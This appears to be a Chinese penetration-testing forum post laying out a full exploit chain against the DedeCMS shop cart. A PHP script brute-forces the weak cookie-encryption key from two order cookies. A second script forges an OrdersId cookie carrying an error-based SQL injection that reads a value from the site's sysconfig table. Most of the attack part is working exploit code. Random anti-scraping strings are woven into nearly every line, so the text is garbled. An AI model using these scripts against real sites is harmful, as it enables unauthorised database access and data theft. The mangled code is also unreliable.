找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 织梦CMS漏洞dedecms漏洞SQL注入漏洞
返回列表 发新帖
查看: 2236|回复: 0
打印 上一主题 下一主题

织梦CMS漏洞dedecms漏洞SQL注入漏洞

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-2-13 23:58:29 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
www.xxx.com/plus/search.php?keyword=% r. H' {- Q: h0 J3 I
在 include/shopcar.class.php中4 v, U) o: ?5 U, q- y8 s' y4 Z
先看一下这个shopcar类是如何生成cookie的
. q8 c  m- ?6 p1 q* {0 O4 r239      function saveCookie($key,$value)
! i+ X( v1 p5 c: \9 Y9 D240      {1 j7 y) R* [, y1 `  u
241          if(is_array($value))
) X" J  v# y# g  }242          {: ~* M( ^& M4 |: Y; \) t- W% H
243              $value = $this->enCrypt($this->enCode($value));; u+ L2 @/ g) I( J9 K
244          }
$ |' d9 _8 ]7 D' K" J( ?* U245          else
# u4 }5 H; s0 i: V1 h3 W246          {  W+ j$ N1 i# p# Z
247              $value = $this->enCrypt($value);& z/ e- E( f% I" j: f2 n- B+ D
248          }
4 B5 T. L; n7 q5 }' }" ~$ u5 B249          setcookie($key,$value,time()+36000,’/');' w0 v2 R' C! A# |  d& A
250      }
% |1 u- m; y( h& y7 C简单的说,$key就是cookie的key,value就是value,enCode的作用是将array类型转变为a=yy&b=cc&d=know这样的类型,关键是enCrypt函数' d  Q% W4 l3 D" D
186      function enCrypt($txt)
/ e/ h$ M/ [3 x" G/ V- Y- c. w187      {2 F  r% u/ u( y
188          srand((double)microtime() * 1000000);
# b+ |9 z' r! v2 N% A4 r7 {# V189          $encrypt_key = md5(rand(0, 32000));9 H, L. r! y6 w8 H) C; q
190          $ctr = 0;9 @' O5 l. X+ o
191          $tmp = ”;
2 x2 l1 i, ]# |7 i7 m3 t192          for($i = 0; $i < strlen($txt); $i++)' [- @( l  [* E
193          {
) t2 j. ~2 {* m! j' z9 F" X194              $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;- r; |! G1 s+ [8 m, X) x
195              $tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);# U: I" b" j* Q+ C
196          }2 v1 z' E# u: K& ?/ L* s  L/ A
197          return base64_encode($this->setKey($tmp));* H: \3 G+ M9 g
198      }
8 ]) @! z. @6 `2 U3 F: z7 X2 ]213      function setKey($txt)4 h4 {) |- s, ~0 a% r
214      {
5 u7 Q1 e; l. b8 d. v215          global $cfg_cookie_encode;2 X- h: Q0 ^. Z& ^$ J
216          $encrypt_key = md5(strtolower($cfg_cookie_encode));7 v' J# B5 a5 C/ i9 E/ ]9 `
217          $ctr = 0;. G# c: g+ r/ J1 H9 Z; H* V6 R9 x; v
218          $tmp = ”;
! c# N" w$ F& _& Q219          for($i = 0; $i < strlen($txt); $i++)8 T5 j* N( u8 G! l9 V3 p
220          {; ^: C$ h( c$ x; P# |% L
221              $ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;  I/ \3 l$ G, r8 |  k) I$ o& u$ Y
222              $tmp .= $txt[$i] ^ $encrypt_key[$ctr++];
! ]0 @; M9 H# y) a2 }: }7 U% }223          }
: f7 ~* v' M, y; m9 @224          return $tmp;
' r5 s* {  C3 W  I8 g225      }
% A' V& v$ U) j$ \: `7 `* ^5 @: x; renCrypt的参数$txt 我们是可知的,返回值就是cookie的值,这个我们也是可知的
* M" j' ^( a9 B然后到了enCrypt调用 setKey时的参数$tmp,这个参数在某种意义上,我们也是可知的,因为$encrypt_key = md5(rand(0, 32000));只有32000种可能,我们可以推出32000种可能的$tmp,从而推出32000种可能的md5(strtolower($cfg_cookie_encode)),对了,忘记说了,我们的目的是推测出setKey中$encrypt_key的值,然后才能任意构造出购物车的cookie,从推出的32000种md5(strtolower($cfg_cookie_encode)),简单过滤掉非字母数字的key,就只剩下几百个可能的key,然后我们再从新下一次订单,然后再获取几百个可能的key,然后取交集,得到最终key。
: `9 j; _$ K+ x* ?# R6 G/ A具体代码如下:9 z7 ]6 C; Q1 K) q
<?php
. Y1 ?$ r# T5 Y7 t) D5 ]3 a, ^$cookie1 = “X2lRPFNlCmlWc1cvAHNXMABjAToHbVcyB3ZXJFIwA20LIAlzU2ULPARyAmQGIVU5VyJbfFVsBiYNN1dsUG0DIl90UTFTLAo3VjBXYgBvVzgAZAEqBz9XagclVzBSbw==”; // here is the first cookie,change here1 z9 k* V7 E+ g) S0 T( ~
$cookie2 = “ADYCb1RiBmUDJghwUyAFYlIxW2BROwhtVCUIe1AyC2UOJVMpADYBNgJ0AmRUcw5iAncAJ1JrCSlQalBrAj8CIwArAmJUKwY7A2UIPVM8BWpSNltwUWkINVR2CG9QbQ==”; // here is the second cookie ,change here
+ R. W5 p6 s9 Z$ u) L0 q$ L3 w4 `$plantxt = “id=2&price=0&units=fun&buynum=1&title=naduohua1″; // here is the text , change here
( f) N: T6 j3 gfunction reStrCode($code,$string)
' C" Z; ~3 {7 ?5 m5 M. Z" Y{/ O: k* B; M- Q9 f" Z
$code = base64_decode($code);+ I, M, A( c" y* t
$key = “”;
& G( Z" E" g% W  m8 Efor($i=0 ; $i<32 ; $i++), g& C4 O% _7 a- u9 ^# x* n
{
8 Y8 V$ {, s# Z0 b1 V8 l$key .= $string[$i] ^ $code[$i];
' u: v4 _8 N) j' s1 R0 l! I}2 O; ^" N; ?6 Q! Z
return $key;
  |. |0 o/ i8 A4 {# ~}9 q3 B" r6 H* |6 t/ q  n3 b! r# K# P
function getKeys($cookie,$plantxt)( \; `+ l8 o4 L2 `
{0 F; k; }  s1 O7 E, L* l
$tmp = $cookie;% }# c& P2 O: ~6 H, D/ V7 c, c' S
$results = array();3 I, m# x; D4 I$ G
for($j=0 ; $j < 32000; $j++)
, d0 B2 L+ G. L& i{
4 S2 [1 y8 K$ F" E# @
9 U% \( V) ~! U. R$txt = $plantxt;" @( d; |! ^# p2 X5 H
$ctr = 0;
( l& L5 i/ E. b- ^  A6 g$tmp = ”;$ l% x) u8 ^# i  j/ U! M
$encrypt_key = md5($j);& o) |; ~& C) v9 }1 |; h2 q6 T1 K
for($i =0; $i < strlen($txt); $i ++)
* E; ]& Z; p0 x! \9 U) r; ]{
" r. p) d5 U- |4 d/ O! G" {$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;
$ C/ B4 q* u; f0 O* s# o$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);/ t2 @7 Z) v  y
}
% L& K& C; @2 i) q/ r3 o: G0 `$string = $tmp;
  u9 j4 ^+ ^5 w2 x$code = $cookie;
/ ^' }- Y0 S9 `8 f$result = reStrCode($code,$string);
- t6 y. l: z% m$ P5 `if(eregi(‘^[a-z0-9]+$’,$result))
( w* p% u5 q$ \, x+ `) H2 f0 t! V% P{% }% }; \+ ^0 n0 `6 J8 }3 v  n
echo $result.”\n”;
- V$ x+ C5 k2 p0 T' j- |1 }" o$results[] = $result;5 g4 G$ A! ]+ R) ~0 X2 R; @
}( H* D6 f5 c! |
}
4 _1 }! n5 u) Lreturn $results;7 p( C: _7 @4 o1 m: e3 _! G
}4 I1 Y1 U* i2 U5 F4 ~2 z( j" }; l& l
$results1 = getKeys($cookie1,$plantxt);
  j! {  i# ^6 |$results2 = getKeys($cookie2,$plantxt);3 Z; U3 A- c4 k# Q! I( ?* u8 b; y
print “\n——————–real key————————–\n”;# }: N1 T, p, E4 O4 v5 o4 @8 n
foreach($results1 as $test1)
% f' ?3 `* Y* q) z{8 f* N; R: u8 n/ T
foreach($results2 as $test2)
; F: O& C: V+ Z: N{
  l: n! ^/ ^7 ~$ ?* I( g  P' `$ tif($test1 == $test2)
) L0 U/ [& v! f! T{$ \0 U6 G. F3 B
echo $test1.”\n”;- ?( r: i2 X# F5 x3 A( l
}% _5 K3 X# V. `
}* x3 W& [! \! u8 ?6 q
}: P8 y: r# B9 v8 b0 t
?>5 j5 O2 G/ z7 W6 r) Y7 D
cookie1 和 cookie2 是我下了两次订单后分别生成的cookie,
7 B) i  o" f- L, M+ Z$ m2 pplantxt可以根据页面来自己推算,大概就是这个格式:id=2&price=0&units=fun&buynum=1&title=naduohua1- X; j: R- S  y( X2 o
然后推算出md5(strtolower($cfg_cookie_encode))5 r' l) _. p- O9 [3 Y
得到这个key之后,我们就可以构造任意购物车的cookie
2 H* c$ K! `1 ~接着看+ g3 h" J: K  F# ^7 ~+ K4 a3 X1 i3 S8 ~
20  class MemberShops
% }: `# R3 ~9 ]- m21  {# w6 P7 Y' `" f* J6 H$ s
22      var $OrdersId;
8 j: D% K! m* V1 Y23      var $productsId;, L: D8 @, j( u4 [
24
2 [0 g2 W. m! u, u% t, @25      function __construct()$ G, O* n6 H- ~. m" l+ A9 j; p% ?' F
26      {: m$ _  M. z7 V/ w- m8 ]: d
27          $this->OrdersId = $this->getCookie(“OrdersId”);  X! L" j2 `+ ]- A$ ?
28          if(empty($this->OrdersId))
' ^/ E% Y9 H( H3 k/ c8 Z29          {
0 e2 A6 h  D+ Z. K$ u2 e/ K0 H30              $this->OrdersId = $this->MakeOrders();
& {2 Z: z0 m9 `& f, c: ?; G1 p31          }
( m6 T2 [! I+ I# K- l# S32      }
0 D- S/ G+ m# q发现OrderId是从cookie里面获取的0 N# i6 n% P, a9 V% [4 {; _8 J7 h- c
然后  X# L" D1 b: n  I* F1 e
/plus/carbuyaction.php中的& S2 y; }' {0 j; C% a
29      $cart    = new MemberShops();
- ?3 {$ z1 i, O39      $OrdersId = $cart->OrdersId;        //本次记录的订单号/ p8 C8 u7 v! m" T3 ^+ t
……1 G6 N2 ?  W: E' F1 `& m9 z
173          $rows = $dsql->GetOne(“SELECT `oid` FROM #@__shops_orders WHERE oid=’$OrdersId’ LIMIT 0,1″);
0 U) R- E8 C' G+ @/ y接着我们就可以注入了2 K6 O. w6 A$ w) ~
通过利用下面代码生成cookie:
2 _  e4 {% \2 o- O<?php
* n. p, g: z5 H% I' @2 J& ?, `$txt = “1′ or 1=@`\’` and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((select value from #@__sysconfig where aid=3),1,62)))a from information_schema.tables group by a)b) or 1=@`\’` or ’1′=’1″;
6 a) v& J2 c- X1 ]2 f' X0 p( B$encrypt_key = “9f09293b7419ed68448fb51d5b174834″;   // here is the key, please change here, B- G( i# M( ^- d. z! T( r
function setKey($txt)
9 }  [* q1 W2 {* W- n{
4 D9 p( a( n+ j% P- f' dglobal $encrypt_key;
( m' F9 C+ z  C, O$ctr = 0;
3 X7 n! ]7 }6 r0 G5 H$tmp = ”;- j$ f' M- y( m7 _+ e; A) ^
for($i = 0; $i < strlen($txt); $i++)
1 q" a& q" I2 o! F{
6 I5 h$ C( \! |# ^3 y! o$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;- `/ _0 ^1 q6 l  L% ?2 z+ v$ Y5 @
$tmp .= $txt[$i] ^ $encrypt_key[$ctr++];; d2 A5 J- p4 x8 Y
}0 {$ }6 _7 i" Z+ k/ C  z1 x
return $tmp;
; j3 ~$ t+ P0 v' t) R/ G. k6 C}! I! S$ o& i) h# D4 t# g
function enCrypt($txt)" Z% R8 o* }/ O( k/ Z& P+ X, P
{/ `( b8 v3 G' R# q6 N
srand((double)microtime() * 1000000);
! b; N! ]7 q! ?3 U$encrypt_key = md5(rand(0, 32000));6 h7 M7 k5 s+ u5 _. z& H! |
$ctr = 0;
" N7 j3 ?) Q. H- `) E8 g6 O$tmp = ”;3 W6 [# O% K5 T0 @
for($i = 0; $i < strlen($txt); $i++)
3 O5 k0 e/ n9 Y- a/ ^# ^4 Z& T, X{
! \: z9 U0 H  n  a! s- ^$ctr = $ctr == strlen($encrypt_key) ? 0 : $ctr;( \5 e3 ~- o1 n
$tmp .= $encrypt_key[$ctr].($txt[$i] ^ $encrypt_key[$ctr++]);3 C. F6 \' K% Z' f  t, M. K* x
}9 Q  p9 Y0 c) N1 y
return base64_encode(setKey($tmp));  f5 x% q- g* N5 M& {' ^! [
}
* _. ~& O9 X9 F; E$ c/ Jfor($dest =0;$dest = enCrypt($txt);)4 y" }6 Z5 X! h% I0 D3 a, M
{! K  ?# P6 U; R0 k) U
if(!strpos($dest,’+'))) L# c+ f. R- }- w* V) S
{
* Q, H5 i+ D7 G  Pbreak;
% T8 {( Z6 p7 U}. v. H/ D& V6 ]  C# @6 v
}5 B: Q+ o/ n( s2 l, n4 C/ w
echo $dest.”\n”;$ z0 p, B& ~5 {- [3 Y; P1 P9 g
?># E1 R: B. p7 M6 [: ^9 }/ F

/ }4 z) n, q: P2 B* q3 J: j) j
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表